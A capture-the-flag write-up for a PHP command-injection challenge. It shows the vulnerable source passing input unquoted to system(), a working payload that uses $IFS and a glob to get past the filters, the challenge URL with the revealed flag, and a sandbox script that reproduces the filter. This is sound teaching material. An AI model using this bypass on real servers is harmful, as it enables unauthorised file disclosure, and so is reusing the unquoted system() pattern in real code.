Source code everywhere!
Flag format: CTF{}
CTF{a9b6b13862f0a8d1312d777a91a596eba7cb010f}
Get around the stripped whitespace and the deleted word "flag" by using $IFS as the separator and * instead of a file name, so cat$IFS* reads every file in the web root.
After connecting to the webserver, we have a comment that suggests we go to /?source.
We see this code:
<?php
error_reporting(0);
(isset($_GET['source']) AND show_source(__FILE__) AND die());
if(isset($_REQUEST['p'])){
$p = preg_replace('/[^\\x21-\\x7e]/','', $_REQUEST['p']);
$p = str_replace("flag", "", $p);
$p = substr($p,0,9);
system("wget -qO - " . $p . " 2>&1");
}
?>
substr($p, 0, 9) keeps only the first 9 characters of p, and that is all we get to inject into the wget command line. Before that, preg_replace drops every byte outside \x21-\x7e (so spaces, tabs and newlines are gone) and str_replace deletes the word "flag", so a naive cat flag ends up as just cat. Nothing quotes $p, so shell metacharacters such as ; go straight through system().
My payload was: ;cat$IFS*;
$IFS was needed because the server gets rid of the space: $IFS expands to the shell's default field separators (space, tab, newline), so cat$IFS* is split into cat and *, and the * glob matches every file in the web root, including index.php, without ever spelling out "flag". The leading ; ends the wget command, which has no URL and simply fails. The trailing ; was meant to separate cat from the 2>&1, but substr() cuts the input to 9 characters, so it never reaches the shell; the command that actually runs is wget -qO - ;cat$IFS* 2>&1, and the 2>&1 only merges cat's stderr into the response, which does no harm.
URL: [http://34.141.72.235:32228/?p=;cat$IFS*;](http://34.141.72.235:32228/?p=;cat$IFS*;)
Afterwards, the dumped index.php contains the flag in a PHP comment. The browser treats the <?php ... ?> block as a tag and does not render it, so view the page source to see it:
<?php
//CTF{a9b6b13862f0a8d1312d777a91a596eba7cb010f}
?>
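To see exactly what survives the filter and why the $IFS trick works, here is an added shell script (my own, not the challenge's code) that reimplements the three PHP filter steps with tr, sed and cut, builds the command string the server would hand to system(), and runs it in a throwaway directory holding a constructed index.php with a made-up flag. wget is not required: whether it is missing or just fails for lack of a URL, the ; moves the shell on to cat, exactly as on the real target.

```shell
#!/bin/sh
# Added example, not the challenge's own code: reproduce the filter chain from
# index.php and run the resulting command in a sandbox directory.

# Same three steps as the PHP:
#   preg_replace('/[^\x21-\x7e]/', '', $p)  -> keep only printable non-space ASCII
#   str_replace('flag', '', $p)             -> delete every literal "flag" (one pass)
#   substr($p, 0, 9)                        -> keep the first 9 characters
filter_p() {
    printf '%s' "$1" | LC_ALL=C tr -cd '!-~' | sed 's/flag//g' | cut -c1-9
}

# The command line system() receives: our 9 characters are spliced between
# "wget -qO - " and " 2>&1" with no quoting at all.
build_cmd() {
    printf 'wget -qO - %s 2>&1' "$(filter_p "$1")"
}

# Run the injected command in a temporary web root. The files and the flag are
# constructed for this example; the real web root held the challenge's index.php.
run_in_sandbox() {
    dir=$(mktemp -d) || return 1
    printf '<?php\n//CTF{example_flag_constructed}\n?>\n' > "$dir/index.php"
    printf 'not the flag\n' > "$dir/readme.txt"
    # wget fails (no URL) or may be absent; either way ";" moves on to cat.
    ( cd "$dir" && sh -c "$(build_cmd "$1")" 2>/dev/null )
    rc=$?
    rm -rf "$dir"
    return $rc
}

# Stand-alone demo.
echo "filtered : $(filter_p ';cat$IFS*;')"   # trailing ; is cut off by substr
echo "command  : $(build_cmd ';cat$IFS*;')"
echo "naive    : $(filter_p 'cat flag')"      # space stripped, "flag" deleted -> cat
run_in_sandbox ';cat$IFS*;'
```

The sandbox run prints both files, the constructed index.php first, which is the same behaviour that leaked the real flag: * matches every non-hidden file in the directory, so no file name containing "flag" ever has to appear in the payload.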